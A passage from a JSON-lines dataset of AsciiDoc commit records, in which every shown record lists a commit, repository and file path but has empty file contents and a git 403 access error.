guide\n\n","repos":"metatron-app\/metatron-discovery,metatron-app\/metatron-discovery,metatron-app\/metatron-discovery,metatron-app\/metatron-discovery,metatron-app\/metatron-discovery,metatron-app\/metatron-discovery,metatron-app\/metatron-discovery","old_file":"discovery-server\/src\/main\/asciidoc\/application-config-guide.adoc","new_file":"discovery-server\/src\/main\/asciidoc\/application-config-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/metatron-app\/metatron-discovery.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"548e4c310e4a28252cc5eb56eea5e3d590f57c64","subject":"Aggiunta del testo","message":"Aggiunta del testo","repos":"gionatamassibenincasa\/scrittura_con_asciidoc,gionatamassibenincasa\/scrittura_con_asciidoc,gionatamassibenincasa\/scrittura_con_asciidoc","old_file":"scrittura_ts_asciidoc.adoc","new_file":"scrittura_ts_asciidoc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gionatamassibenincasa\/scrittura_con_asciidoc.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"d19b1e5c7ab2ff24724be04b1576019a692860e3","subject":"Update 2016-12-03-How-to-compile-J-S-P-with-Tomcat-and-Maven-faster.adoc","message":"Update 2016-12-03-How-to-compile-J-S-P-with-Tomcat-and-Maven-faster.adoc","repos":"tcollignon\/tcollignon.github.io,tcollignon\/tcollignon.github.io,tcollignon\/tcollignon.github.io,tcollignon\/tcollignon.github.io","old_file":"_posts\/2016-12-03-How-to-compile-J-S-P-with-Tomcat-and-Maven-faster.adoc","new_file":"_posts\/2016-12-03-How-to-compile-J-S-P-with-Tomcat-and-Maven-faster.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tcollignon\/tcollignon.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"26355eb09f8bc1ad8e0c3e85cca1b1d91124fd1d","subject":"Update 2018-07-0-Quick-Tips-3-How-to-create-a-pure-CSS-Off-Canvas-Menu.adoc","message":"Update 2018-07-0-Quick-Tips-3-How-to-create-a-pure-CSS-Off-Canvas-Menu.adoc","repos":"heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io","old_file":"_posts\/2018-07-0-Quick-Tips-3-How-to-create-a-pure-CSS-Off-Canvas-Menu.adoc","new_file":"_posts\/2018-07-0-Quick-Tips-3-How-to-create-a-pure-CSS-Off-Canvas-Menu.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heliomsolivas\/heliomsolivas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3f1ae270ab8e4d1a528cad750fee9e7d4f3f3582","subject":"Issue #4 Processes section finished.","message":"Issue #4 Processes section finished.\n","repos":"uclouvain\/osis_louvain,uclouvain\/osis,uclouvain\/osis,uclouvain\/OSIS-Louvain,uclouvain\/osis,uclouvain\/osis_louvain,uclouvain\/OSIS-Louvain,uclouvain\/OSIS-Louvain,uclouvain\/osis,uclouvain\/osis_louvain","old_file":"doc\/development\/software-process.adoc","new_file":"doc\/development\/software-process.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/uclouvain\/osis.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} 
{"commit":"e5a3f3df0df5b6c491f598f8b06abdda288b5355","subject":"Update 2015-07-23-Lorem-ipsum.adoc","message":"Update 2015-07-23-Lorem-ipsum.adoc","repos":"fastretailing\/blog,fastretailing\/blog,fastretailing\/blog","old_file":"_posts\/2015-07-23-Lorem-ipsum.adoc","new_file":"_posts\/2015-07-23-Lorem-ipsum.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fastretailing\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"36a86a09c68ffafefd9fa2ba2d186ef9ff5153b4","subject":"Update 2016-09-02-Swift-Tuple.adoc","message":"Update 2016-09-02-Swift-Tuple.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-02-Swift-Tuple.adoc","new_file":"_posts\/2016-09-02-Swift-Tuple.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8d71acda07a256bc7261437db42a158386c00a00","subject":"Update 2015-05-18-uGUI.adoc","message":"Update 2015-05-18-uGUI.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-05-18-uGUI.adoc","new_file":"_posts\/2015-05-18-uGUI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9fa9ee8b215ba2816a716d8b7adfe234924c9910","subject":"Update 2018-11-11-Go-2.adoc","message":"Update 2018-11-11-Go-2.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-11-Go-2.adoc","new_file":"_posts\/2018-11-11-Go-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a1b8c8f238a043052c55354e0756b676f7fd6161","subject":"Add link to GitHub","message":"Add link to GitHub\n","repos":"mlocati\/MyDevelopmentEnvironment,mlocati\/MyDevelopmentEnvironment,mlocati\/MyDevelopmentEnvironment","old_file":"src\/sections\/01-introduction.adoc","new_file":"src\/sections\/01-introduction.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mlocati\/MyDevelopmentEnvironment.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"32017f4ea50cf45dab95f00f0164daf4da7c862d","subject":"Update 2016-12-23-Larastudy.adoc","message":"Update 2016-12-23-Larastudy.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-23-Larastudy.adoc","new_file":"_posts\/2016-12-23-Larastudy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"32daa9d79ef4aa5f85fcb3ed010a6265e750391c","subject":"Update 2016-11-20-The-Importance-of-Research.adoc","message":"Update 2016-11-20-The-Importance-of-Research.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2016-11-20-The-Importance-of-Research.adoc","new_file":"_posts\/2016-11-20-The-Importance-of-Research.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cb24194028cbaf7ba4b985d277e2408a66d01049","subject":"y2b create post Becoming the \\","message":"y2b create post Becoming the \\","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-06-04-Becoming-the-.adoc","new_file":"_posts\/2013-06-04-Becoming-the-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"32fa12d7fdc7dc8ff70b383e8aae6db5da855bb1","subject":"Update 2018-12-05-vr-programing.adoc","message":"Update 2018-12-05-vr-programing.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-12-05-vr-programing.adoc","new_file":"_posts\/2018-12-05-vr-programing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ccde1a074b53981edfbd0e0490d9411192752d33","subject":"Update 2018-12-05-vr-programing.adoc","message":"Update 2018-12-05-vr-programing.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-12-05-vr-programing.adoc","new_file":"_posts\/2018-12-05-vr-programing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"56aea4f4152da679d3dff307a2905312377375ba","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2022\/10\/14\/deref.adoc","new_file":"content\/news\/2022\/10\/14\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"97da6ab835b01d83640e7a2e70941043d1478dc3","subject":"y2b create post Ultimate Controller Collection (XBOX 360, PS3, Wii U, Custom Controllers \\u0026 More)","message":"y2b create post Ultimate Controller Collection (XBOX 360, PS3, Wii U, Custom Controllers \\u0026 
More)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-03-13-Ultimate-Controller-Collection-XBOX-360-PS3-Wii-U-Custom-Controllers-u0026-More.adoc","new_file":"_posts\/2013-03-13-Ultimate-Controller-Collection-XBOX-360-PS3-Wii-U-Custom-Controllers-u0026-More.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b9a3d6b2f4064c9b486bc78a851f56d3791a328b","subject":"y2b create post What's the best candy? (Candy Subscription Box)","message":"y2b create post What's the best candy? (Candy Subscription Box)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-04-11-Whats-the-best-candy-Candy-Subscription-Box.adoc","new_file":"_posts\/2014-04-11-Whats-the-best-candy-Candy-Subscription-Box.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3d41d128a79ea013c5da3fccaff3616e589f5e92","subject":"Update 2015-04-08-agenda-asciidoctor-devoxxfr-tshirt-a-gagner.adoc","message":"Update 2015-04-08-agenda-asciidoctor-devoxxfr-tshirt-a-gagner.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-04-08-agenda-asciidoctor-devoxxfr-tshirt-a-gagner.adoc","new_file":"_posts\/2015-04-08-agenda-asciidoctor-devoxxfr-tshirt-a-gagner.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b94ccd55e175e20eb294fb5d77fb46ffbae31716","subject":"y2b create post GoPro HD Motorsports HERO Camera Unboxing \\u0026 Overview","message":"y2b create post GoPro HD Motorsports HERO Camera Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-01-05-GoPro-HD-Motorsports-HERO-Camera-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2011-01-05-GoPro-HD-Motorsports-HERO-Camera-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c6e62b204704a25bfca83e66bae584208c2811e0","subject":"Update 2019-02-14-Google-Spread-Sheet.adoc","message":"Update 2019-02-14-Google-Spread-Sheet.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-02-14-Google-Spread-Sheet.adoc","new_file":"_posts\/2019-02-14-Google-Spread-Sheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"64bd5e193df0fbc86177b0a9f2470dc9f173c3bd","subject":"Updated index doc file to include 
information about ports.","message":"Updated index doc file to include information about ports.\n","repos":"lowcloudnine\/singularity-spark,lowcloudnine\/singularity-spark","old_file":"docs\/index.adoc","new_file":"docs\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lowcloudnine\/singularity-spark.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"caffea94593e507bea0fd93e576eb3b833f2b4b3","subject":"Update 2011-10-26-Code-Quickie-2-anonymous-functions-and-global-variable.adoc","message":"Update 2011-10-26-Code-Quickie-2-anonymous-functions-and-global-variable.adoc","repos":"fbiville\/fbiville.github.io,fbiville\/fbiville.github.io,fbiville\/fbiville.github.io,fbiville\/fbiville.github.io","old_file":"_posts\/2011-10-26-Code-Quickie-2-anonymous-functions-and-global-variable.adoc","new_file":"_posts\/2011-10-26-Code-Quickie-2-anonymous-functions-and-global-variable.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fbiville\/fbiville.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3c770575053efeda76740ff1981e39d57ad8dacd","subject":"chore: fix typo","message":"chore: fix typo\n","repos":"gravitee-io\/gravitee.io,gravitee-io\/gravitee.io,gravitee-io\/gravitee.io","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/gravitee.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"69829db39f85314794dad2a3f936a9cead8dc7e3","subject":"Update 2016-07-04-Criando-um-menu-de-navegacao-com-o-Vuejs.adoc","message":"Update 2016-07-04-Criando-um-menu-de-navegacao-com-o-Vuejs.adoc","repos":"heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io","old_file":"_posts\/2016-07-04-Criando-um-menu-de-navegacao-com-o-Vuejs.adoc","new_file":"_posts\/2016-07-04-Criando-um-menu-de-navegacao-com-o-Vuejs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heliomsolivas\/heliomsolivas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3faec8038c330f29dabdcd0cea2ff403adf26c4a","subject":"Add LiftScreen 2.6 to 3.0 migration doc.","message":"Add LiftScreen 2.6 to 3.0 migration doc.\n","repos":"lift\/framework,lift\/framework,lift\/framework,lift\/framework","old_file":"docs\/migration\/2.6-to-3.0-lift-screen.adoc","new_file":"docs\/migration\/2.6-to-3.0-lift-screen.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lift\/framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2ab49647cb42bd905785dec9626557f3bd0b7c11","subject":"Deleted 1993-11-17.adoc","message":"Deleted 1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"1993-11-17.adoc","new_file":"1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1b04cf509e8de18b77018152204722ffcabcd3ee","subject":"Better format","message":"Better format\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"93162c0055fb1b476443f58292aef704444a3184","subject":"Wording","message":"Wording\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"HTML to DOM.adoc","new_file":"HTML to DOM.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4019cbb2222d7026b88540ee63917e4d968a42a9","subject":"Update doc after review","message":"Update doc after review\n","repos":"wangtuo\/elasticsearch,fred84\/elasticsearch,C-Bish\/elasticsearch,JSCooke\/elasticsearch,rlugojr\/elasticsearch,rlugojr\/elasticsearch,jprante\/elasticsearch,jprante\/elasticsearch,MisterAndersen\/elasticsearch,a2lin\/elasticsearch,wenpos\/elasticsearch,obourgain\/elasticsearch,brandonkearby\/elasticsearch,brandonkearby\/elasticsearch,mohit\/elasticsearch,JackyMai\/elasticsearch,wenpos\/elasticsearch,wangtuo\/elasticsearch,i-am-Nathan\/elasticsearch,nilabhsagar\/elasticsearch,fernandozhu\/elasticsearch,maddin2016\/elasticsearch,pozhidaevak\/elasticsearch,i-am-Nathan\/elasticsearch,nilabhsagar\/elasticsearch,Helen-Zhao\/elasticsearch,markwalkom\/elasticsearch,winstonewert\/elasticsearch,fernandozhu\/elasticsearch,nilabhsagar\/elasticsearch,maddin2016\/elasticsearch,wenpos\/elasticsearch,fred84\/elasticsearch,scottsom\/elasticsearch,artnowo\/elasticsearch,mortonsykes\/elasticsearch,StefanGor\/elasticsearch,MisterAndersen\/elasticsearch,robin13\/elasticsearch,LeoYao\/elasticsearch,winstonewert\/elasticsearch,markwalkom\/elasticsearch,uschindler\/elasticsearch,mortonsykes\/elasticsearch,njlawton\/elasticsearch,s1monw\/elasticsearch,mjason3\/elasticsearch,Helen-Zhao\/elasticsearch,njlawton\/elasticsearch,obourgain\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,jimczi\/elasticsearch,mjason3\/elasticsearch,fernandozhu\/elasticsearch,HonzaKral\/elasticsearch,vroyer\/elasticassandra,markwalkom\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,geidies\/elasticsearch,i-am-Nathan\/elasticsearch,artnowo\/elasticsearch,masaruh\/elasticsearch,artnowo\/elasticsearch,JSCooke\/elasticsearch,robin13\/elasticsearch,ZTE-PaaS\/elasticsearch,robin13\/elasticsearch,JSCooke\/elasticsearch,kalimatas\/elasticsearch,scottsom\/elasticsearch,MisterAndersen\/elasticsearch,mohit\/elasticsearch,geidies\/elasticsearch,bawse\/elasticsearch,LeoYao\/elasticsearch,masaruh\/elasticsearch,JackyMai\/elasticsearch,JSCooke\/elasticsearch,nknize\/elasticsearch,fred84\/elasticsearch,gingerwizard\/elasticsearch,JackyMai\/elasticsearch,IanvsPoplicola\/elasticsearch,s1monw\/elasticsearch,wangtuo\/elasticsearch,IanvsPoplicola\/elasticsearch,qwerty4030\/elasticsearch,gfyoung\/elasticsearch,Helen-Zhao\/elasticsearch,nazarewk\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,fred84\/elasticsearch,mikemccand\/elasticsearch,njlawton\/elasticsearch,HonzaKral\/elasticsearch,scottsom\/elasticsearch,jprante\/elasticsearch,Helen-Zhao\/elasticsearch,ThiagoGarciaAlves
\/elasticsearch,rajanm\/elasticsearch,glefloch\/elasticsearch,Stacey-Gammon\/elasticsearch,maddin2016\/elasticsearch,nilabhsagar\/elasticsearch,sneivandt\/elasticsearch,mikemccand\/elasticsearch,mohit\/elasticsearch,scorpionvicky\/elasticsearch,rajanm\/elasticsearch,kalimatas\/elasticsearch,mjason3\/elasticsearch,sneivandt\/elasticsearch,ZTE-PaaS\/elasticsearch,scottsom\/elasticsearch,winstonewert\/elasticsearch,rajanm\/elasticsearch,sneivandt\/elasticsearch,masaruh\/elasticsearch,gingerwizard\/elasticsearch,vroyer\/elasticassandra,rlugojr\/elasticsearch,jprante\/elasticsearch,alexshadow007\/elasticsearch,bawse\/elasticsearch,Shepard1212\/elasticsearch,sneivandt\/elasticsearch,brandonkearby\/elasticsearch,glefloch\/elasticsearch,naveenhooda2000\/elasticsearch,umeshdangat\/elasticsearch,brandonkearby\/elasticsearch,masaruh\/elasticsearch,shreejay\/elasticsearch,alexshadow007\/elasticsearch,qwerty4030\/elasticsearch,nazarewk\/elasticsearch,LeoYao\/elasticsearch,Shepard1212\/elasticsearch,StefanGor\/elasticsearch,fred84\/elasticsearch,lks21c\/elasticsearch,C-Bish\/elasticsearch,geidies\/elasticsearch,glefloch\/elasticsearch,njlawton\/elasticsearch,mikemccand\/elasticsearch,scorpionvicky\/elasticsearch,vroyer\/elassandra,gfyoung\/elasticsearch,glefloch\/elasticsearch,umeshdangat\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,Stacey-Gammon\/elasticsearch,mohit\/elasticsearch,lks21c\/elasticsearch,LewayneNaidoo\/elasticsearch,ZTE-PaaS\/elasticsearch,IanvsPoplicola\/elasticsearch,naveenhooda2000\/elasticsearch,qwerty4030\/elasticsearch,coding0011\/elasticsearch,umeshdangat\/elasticsearch,obourgain\/elasticsearch,qwerty4030\/elasticsearch,markwalkom\/elasticsearch,kalimatas\/elasticsearch,strapdata\/elassandra,GlenRSmith\/elasticsearch,nezirus\/elasticsearch,Shepard1212\/elasticsearch,LeoYao\/elasticsearch,wangtuo\/elasticsearch,lks21c\/elasticsearch,JSCooke\/elasticsearch,artnowo\/elasticsearch,mikemccand\/elasticsearch,LeoYao\/elasticsearch,scorpionvicky\/elasticsearch,qwerty4030\/elasticsearch,rlugojr\/elasticsearch,nazarewk\/elasticsearch,a2lin\/elasticsearch,s1monw\/elasticsearch,gfyoung\/elasticsearch,strapdata\/elassandra,LeoYao\/elasticsearch,bawse\/elasticsearch,pozhidaevak\/elasticsearch,mortonsykes\/elasticsearch,LewayneNaidoo\/elasticsearch,Stacey-Gammon\/elasticsearch,wenpos\/elasticsearch,mjason3\/elasticsearch,geidies\/elasticsearch,Shepard1212\/elasticsearch,scorpionvicky\/elasticsearch,shreejay\/elasticsearch,naveenhooda2000\/elasticsearch,mortonsykes\/elasticsearch,shreejay\/elasticsearch,vroyer\/elasticassandra,LeoYao\/elasticsearch,markwalkom\/elasticsearch,i-am-Nathan\/elasticsearch,robin13\/elasticsearch,MisterAndersen\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,a2lin\/elasticsearch,elasticdog\/elasticsearch,MisterAndersen\/elasticsearch,HonzaKral\/elasticsearch,s1monw\/elasticsearch,strapdata\/elassandra,LewayneNaidoo\/elasticsearch,artnowo\/elasticsearch,jimczi\/elasticsearch,scorpionvicky\/elasticsearch,nazarewk\/elasticsearch,C-Bish\/elasticsearch,uschindler\/elasticsearch,winstonewert\/elasticsearch,naveenhooda2000\/elasticsearch,Helen-Zhao\/elasticsearch,nknize\/elasticsearch,vroyer\/elassandra,coding0011\/elasticsearch,bawse\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,shreejay\/elasticsearch,kalimatas\/elasticsearch,brandonkearby\/elasticsearch,markwalkom\/elasticsearch,umeshdangat\/elasticsearch,rlugojr\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,nezirus\/elasticsearch,nilabhsagar\/elasticsearch,jimczi\/elasticsearch,mohit\/elasticsearch,
glefloch\/elasticsearch,maddin2016\/elasticsearch,Shepard1212\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,StefanGor\/elasticsearch,s1monw\/elasticsearch,gfyoung\/elasticsearch,StefanGor\/elasticsearch,LewayneNaidoo\/elasticsearch,HonzaKral\/elasticsearch,GlenRSmith\/elasticsearch,bawse\/elasticsearch,lks21c\/elasticsearch,rajanm\/elasticsearch,gingerwizard\/elasticsearch,nezirus\/elasticsearch,jimczi\/elasticsearch,shreejay\/elasticsearch,coding0011\/elasticsearch,lks21c\/elasticsearch,masaruh\/elasticsearch,IanvsPoplicola\/elasticsearch,winstonewert\/elasticsearch,i-am-Nathan\/elasticsearch,elasticdog\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,maddin2016\/elasticsearch,nezirus\/elasticsearch,nezirus\/elasticsearch,C-Bish\/elasticsearch,elasticdog\/elasticsearch,ZTE-PaaS\/elasticsearch,jimczi\/elasticsearch,Stacey-Gammon\/elasticsearch,pozhidaevak\/elasticsearch,GlenRSmith\/elasticsearch,JackyMai\/elasticsearch,Stacey-Gammon\/elasticsearch,gingerwizard\/elasticsearch,jprante\/elasticsearch,uschindler\/elasticsearch,gfyoung\/elasticsearch,nazarewk\/elasticsearch,nknize\/elasticsearch,pozhidaevak\/elasticsearch,a2lin\/elasticsearch,a2lin\/elasticsearch,obourgain\/elasticsearch,mikemccand\/elasticsearch,strapdata\/elassandra,JackyMai\/elasticsearch,LewayneNaidoo\/elasticsearch,njlawton\/elasticsearch,IanvsPoplicola\/elasticsearch,elasticdog\/elasticsearch,wenpos\/elasticsearch,coding0011\/elasticsearch,vroyer\/elassandra,alexshadow007\/elasticsearch,mjason3\/elasticsearch,obourgain\/elasticsearch,alexshadow007\/elasticsearch,mortonsykes\/elasticsearch,rajanm\/elasticsearch,rajanm\/elasticsearch,pozhidaevak\/elasticsearch,ZTE-PaaS\/elasticsearch,kalimatas\/elasticsearch,umeshdangat\/elasticsearch,nknize\/elasticsearch,fernandozhu\/elasticsearch,fernandozhu\/elasticsearch,scottsom\/elasticsearch,sneivandt\/elasticsearch,uschindler\/elasticsearch,StefanGor\/elasticsearch,wangtuo\/elasticsearch,geidies\/elasticsearch,geidies\/elasticsearch,strapdata\/elassandra,alexshadow007\/elasticsearch,uschindler\/elasticsearch,C-Bish\/elasticsearch,naveenhooda2000\/elasticsearch,elasticdog\/elasticsearch","old_file":"TESTING.asciidoc","new_file":"TESTING.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/obourgain\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"bf9207921846a4604ae72c26cf59364e2dfe4e19","subject":"Fix Readme.asciidoc sample code","message":"Fix Readme.asciidoc sample code\n","repos":"xmeta\/dinzai-datni","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xmeta\/dinzai-datni.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"03f86ea51eb631a61c4b97af31bf9adceda4ad82","subject":"Update README.asciidoc","message":"Update README.asciidoc\n\nfix","repos":"storeframework\/ministore-project","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/storeframework\/ministore-project.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"113ab528951e72ae017b95ba9e40cab6f4e8f434","subject":"Update 2016-04-15-Ubiquitous-language-without-domain-driven-design.adoc","message":"Update 
